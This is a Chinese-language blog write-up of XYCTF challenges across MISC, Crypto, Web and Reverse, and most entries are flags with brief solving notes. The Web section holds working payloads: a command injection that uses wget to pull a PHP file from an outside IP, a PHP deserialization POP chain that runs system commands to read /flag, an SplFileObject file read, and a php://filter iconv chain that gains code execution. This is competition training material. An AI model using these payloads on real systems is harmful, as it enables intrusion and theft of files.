本博客仅为记录解题的过程!
MISC
game
google识图
XYCTF{Papers Please}
熊博士
XYCTF{liu_ye_mei_you_xiao_jj}
疯狂大杂烩!九转功成
在远古时期,修仙过程被分为:炼气、筑基、结丹、元婴、化神、炼虚、合体、大乘、渡劫等九大层次。有多少心怀抱负的年轻一脉想要登临那巅峰的神仙境地。但对于普通人来说无疑炼气是他们拥有资格的前提。唯有一步一步跨过艰难险阻终会飞升成仙。若你想拿到属于你的那份flag,那就从炼气开始慢慢突破吧!!年轻人不是老夫瞧不起你!你可要想清楚是否要登临那虚无缥缈的神仙境地。1、炼气
曰:玉魔命灵天观罗炁观神冥西道地真象茫华茫空吉清荡罗命色玉凶北莽人鬼乐量西北灵色净魂地魂莽玉凶阿人梵莽西量魄周界
天书(曰)解码
First_layer_simple解压缩后,修复png
flag1:XYCTF{T3e_C0mb1nation_2、筑基
xihak-minoh-zusok-humak-zurok-gulyk-somul-nenel-dalek-nusyh-zumek-sysuk-zelil-fepak-tysok-senax
BubbleBabble解码
The_second_layer_is_also_simple解压缩后
base64解码
flag2:0f_crypt0_and_3、结丹
4个交点表示-,3个交点表示空格间隔,2个交点表示,转摩斯密码
- .... . ..--.- - .... .. .-. -..
全小写: the_third解压缩后继续爆破zip,密码123456
继续解压缩,Base32解码
flag3:misc_1s_re6lly_fun!!4、元婴
爆破PBE
The_fourth_floor_is_okay解压缩,Rot解密
脚本解密微信数据库
flag4:L1u_and_K1cky_Mu5、化神
enc = 'key{liu*****'
md5 = '87145027d8664fca1413e6a24ae2fbe7'盲猜最后一位是 } ,MD5爆破
明文:key{liuyyds} ---> 哈希:87145027d8664fca1413e6a24ae2fbe7解压缩后,根据文件名知道serpent加密,在线解密
下载解密文件,有0宽
_3re_so_sm4rt!6、炼虚
wszrdc
fgtrfvb
ghytgbn
rfctg
yhju
frtg
uyhbghj
6yhn
uyhjujmn
tgvvghb
yhnmghj
4rfv
derf
iujkikmn
键盘密码:keeponfighting解压缩后,对yuanshen.jpg爆破
In_just_a_few_m1nutes_7、合体
密文:Tig+AF8-viakubq+AF8-vphrz+AF8-xi+AF8-uayzdyrjs
去除+AF8-弗吉尼亚加密,使用密钥ABCDEFGHIJKLMNOPQRSTUVWXYZ解密
Theseventhlevelisdifficult
补全下划线
The_seventh_level_is_difficult解压缩后,得到图片
根据颜色表示的数值,拼成数字
164 150 145 171 137
167 145 162 145 137
164 150 162 60 165
147 150 418进制数字转ASCII码
they_were_thr0ugh!8、大乘
b'password{pruning_algorithm}'解压缩后,得到“咦?.txt”文本文件,no替换成0,yes替换成1,爆破宽高,转图片
分辨率548*72,图片正常显示
原神提瓦特须弥沙漠文
sm3rty0ucando9、渡劫
b'game_over'解压缩后,根据提示,读取zip文件尾部,发现OutSecret特征
_nine_turns?}把九段flag拼接起来,根据其他8段特征,第6段首字母大写,且补充下划线
XYCTF{T3e_c0mb1nation_0f_crypt0_and_misc_1s_re6lly_fun!!L1u_and_K1cky_Mu_3re_so_sm4rt!In_just_a_few_m1nutes_they_were_thr0ugh!Sm3rt_y0u_can_do_nine_turns?}MD5之后
XYCTF{b1bdc6cf06a28b97c91c1c12f0d3bc00}
我的二维码为啥扫不出来?
爆破完逐一扫码,发现5_12.png能扫出flag
flag{qR_c0d3_1s_s0_fun}
Rosk,Paper,Scissors!
根据题目脚本分析,只有第1次AI结果是随机的,余下的99次是根据自己出的结果列表生成,胜AI顺序就是只有三种,脚本生成顺序
先用脚本一计算出石头剪刀布的顺序
再用脚本获取flag
XYCTF{ROsK,p4PEr,5cI5sors_90142439eb04}
美妙的歌声
XYCTF{T0uch_y0ur_he3rt_d55ply!!}
ez_隐写
直接用7z解压缩,修复hint.png
XYCTF{159-WSXIJN-852}
ZIP神之套
CTF{1A4B8-C9D2F3E-6A4B8C-9D2F3E7F}
zzl的护理小课堂
XYCTF{2z1_teIl_y0U_6d2b446fd55b}
TCPL
安装QEMU
根据提示用0替换1
FLAG{PLCT_An4_r0SCv_x0huann0}
彩蛋?
XYCTF{this_a_bl0ckbuster_for_png_and_i_think_yon_can_find_it}
网络追踪
根据扫描端口特点,找出拒绝会话数为0端口
445端口的数据包最多,考虑是关于smb的cve,找到关于近期的cve,逐一尝试
CVE-2017-7494
CVE-2017-11780
CVE-2018-8336
CVE-2018-0833
CVE-2020-0796
CVE-2020-1301
CVE-2022-3592
CVE-2022-3437
CVE-2023-32021
CVE-2008-4250XYCTF{192.168.204.133_445_139_135_CVE-2008-4250}
真>签到
XYCTF{59bd0e77d13c_1406b23219e_f91cf3a_153e8ea4_77508ba}
Osint1
xyctf{江苏省|南通市|滨海东路|黄海}
出题有点烦
XYCTF{981e5_f3ca30_c841487_830f84_fb433e}
Ez_osint
XYCTF{2fb65b60505cf6a9243661ce79431e7a}
EZ_Base1024*2
XYCTF{84ca3a6e-3508-4e34-a5e0-7d0f03084181}
Osint2
xyctf{G3293|河南省|老君山}
Crypto
x0r
XYCTF{7dff9919-f94d-41bf-bcdf-00dc4c5280c0}
反方向的密码 相思
XYCTF{!__d3ng__hu0__1@n__3h@n__Chu__!}
fakeRSA
sage
XYCTF{y0u_finally_f0und_t3h_s3cr3ts!!}
factor1
先用维纳攻击(略)求出d和phin,再用sage
XYCTF{a83211a70e18145a59671c08ddc67ba4}
Sign1n[签到]、Sign1n_Revenge
题目Sign1n结果是10110000101100101000011010101000100011001111011001100000110010000111001001101010011011101100110001100100011000100101101001100010011010000111000001101010010110100110100011000110011000100110111001011010110001001100010001100110110011000101101011000110110010000111001001100100011010000111001001100100110001100111001011000110110000100110001011111010
但是无法转字符串,去掉尾部一个0,在头部加个0,变成01011000010110010100001101010100010001100111101100110000011001000011100100110101001101110110011000110010001100010010110100110001001101000011100000110101001011010011010001100011001100010011011100101101011000100110001000110011011001100010110101100011011001000011100100110010001101000011100100110010011000110011100101100011011000010011000101111101
转字符串得到flag:XYCTF{0d957f21-1485-4c17-bb3f-cd92492c9ca1}
同理,题目Sign1n_Revenge
110011001101100011000010110011101111011001110000110001001100110011001100011000000111000001100100011011000101101011001100110001000110100001101010010110100110100001101010011010000111000001011010011100100110100011000100110001100101101001100100110010001100001001100000011100100111000001100100011011100110111011000110011000000110100011111010
flag{8bff0826-fb45-4548-94bc-2da098277c04}
重生之我要当oi爷 pro
照抄picoctf2024的flag_printer解题wp的sage脚本
花点时间跑完,得到一张很大的bmp图片
放大局部
flag{1A2Q3E71528AP49ORT}
babyRSAMAX
p-1光滑数、rabin算法混合
XYCTF{Rabin_is_so_biggggg!}
happy_to_solve1
p、q生成不当,直接套脚本
XYCTF{3f22f4efe3bbbc71bbcc999a0a622a1a23303cdc}
happy_to_solve2
b'XYCTF{7f4b2241951976ce5ef6df44503209059997e5085d1bc21f6bef4d9effb29fd0}'
Random_rr
XYCTF{ba76e13f-269e-4481-baf0-4a50ad17f891}
Complex_dlp
XYCTF{___c0mp13x_d1p_15_3@5y_f0r_y0u___}
factor3
XYCTF{I_love_to_read_the_crypto_paper_and_try_to_ak_them}
easy_ecc
首先将椭圆曲线转化成标准曲线,然后套脚本
XYCTF{ec9a6e17537e81b7f593f65f7e2ca5d575e6b34c504c24e4afb40c1e9dc4be0d}
Web
ezhttp
XYCTF{5c80dce9-86e5-41be-9cd9-9bbd04ebf77b}
ezmd5
XYCTF{ab1b9afe-3302-492a-9d85-8952f5633e40}
ezMake
XYCTF{5b6355d8-e03f-4c89-a445-a703a769dece}
ez?Make
XYCTF{cc0c511c-19db-4472-94a9-5b5299295706}
牢牢记住,逝者为大
攻击机上配置php解析成文本,让目标机读取到php完整内容。
?cmd=%0a$_GET[1];%23&1=wget%20139.224.224.1/x.php
XYCTF{50048950-1658-46ac-b17b-53e2ca190f05}
warm up
XYCTF{6b98086d-34a0-4b76-b8f2-986bed3c52e0}
我是一个复读机
爆破密码,用户名admin,密码asdqwe
XYCTF{e2a00127-1880-457e-96d1-f3404e1ba75a}
ezRCE
变换执行命令
XYCTF{d0acd262-dca7-40bd-aded-84b32dbb855c}
ezSerialize
XYCTF{ba62062a-0ae0-453c-857c-c045574b1837}
ezPOP
<?php
class AAA
{
public $s;
public $a='a';
}
class BBB
{
public $c='73797374656d';
public $d='ls';
}
class CCC
{
public $c;
}
$a = new CCC();
$a->c = new AAA();
$a->c->s = new BBB();
$b = null;
$c = array($a,$b);
echo str_replace("}i:1;","}i:0;",serialize($c));
?>xy=a:2:{i:0;O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:12:"73797374656d";s:1:"d";s:4:"ls /";}s:1:"a";s:1:"a";}}i:0;N;}
xy=a:2:{i:0;O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:12:"73797374656d";s:1:"d";s:9:"cat /flag";}s:1:"a";s:1:"a";}}i:0;N;}
XYCTF{285bb7af-238d-40b2-b884-188814895952}
ezClass
XXX/?a=SplFileObject&aa=/flag&&c=fgets
XYCTF{ef4f0809-f695-44d1-967f-6ac1aefe8625}
ezLFI
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO-2022-KR.UTF16|convert.iconv.ISO-IR-139.UTF-16|convert.iconv.ISO-IR-157.ISO-IR-156|convert.iconv.WINDOWS-1258.ISO_6937|convert.iconv.KOI8-T.ISO-2022-JP-3|convert.iconv.CP874.ISO2022KR|convert.iconv.CSUNICODE.UTF-8|convert.iconv.OSF00010004.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=/readflag
XYCTF{5e3f33d7-e360-4eae-9275-8425aba1ca79}
Reverse
你是真的大学生吗?
xyctf{you_know_8086}
DebugMe
XYCTF{d3bugg3r_15_v3ry_u53ful}
喵喵喵的flag碎了一地
flag{My_fl@g_h4s_br0ken_4parT_Bu7_Y0u_c@n_f1x_1t!}
聪明的信使
flag{Y0u_KnOw_Crypt0_14_v3ry_Imp0rt@nt!}
Trustme
Trustme.apk解压缩得到classes.dex,jadx加载
apk运行后会释放shell.apk并运行
雷电模拟器安装运行,MT管理器查找shell.apk
把shell.apk复制到PC上,解压缩出得到classes.dex,jadx加载
apk加载会在databases文件夹创建一个数据库文件
SQLite数据库
flag从数据库文件读取
从雷电模拟器把数据库文件复制出来
数据库工具直接读取flag,XYCTF{And0r1d_15_V3ryEasy}
砸核桃
顾名思义程序带壳,北斗压缩壳
堆栈平衡,跳转到程序入口
判断输入flag是否大于42,如果是,与this_is_not_flagthis_is_not_flagthis_is_no异或比较
flag{59b8ed8f-af22-11e7-bb4a-3cf862d1ee75}
baby unity
XYCTF{389f6900-e12d-4c54-a85d-64a54af9f84c}
ez_enc
flag{!_r3ea11y_w4nt_@_cu7e_s1$ter}
easy language
XYCTF{y0u_@r3_v3ry_g00d_a7_E_l@ngu@ge}
何须相思煮余年
XYCTF{5b3e07567a9034d06851475481507a75}
What's this
XYCTF{5dcbaed781363fbfb7d8647c1aee6c}
今夕是何年
Kali中安装好QEMU,直接运行
XYCTF{7e5165f1-385d-4fe9-1f2664d833a648a4}
ezmath
XYCTF{q7WYGscUuptTYXjnjKoyUTKtG}
ez_cube
根据顶层棱块归位公式,四种可能,逐一尝试:
flag{RuRURURuruRR}
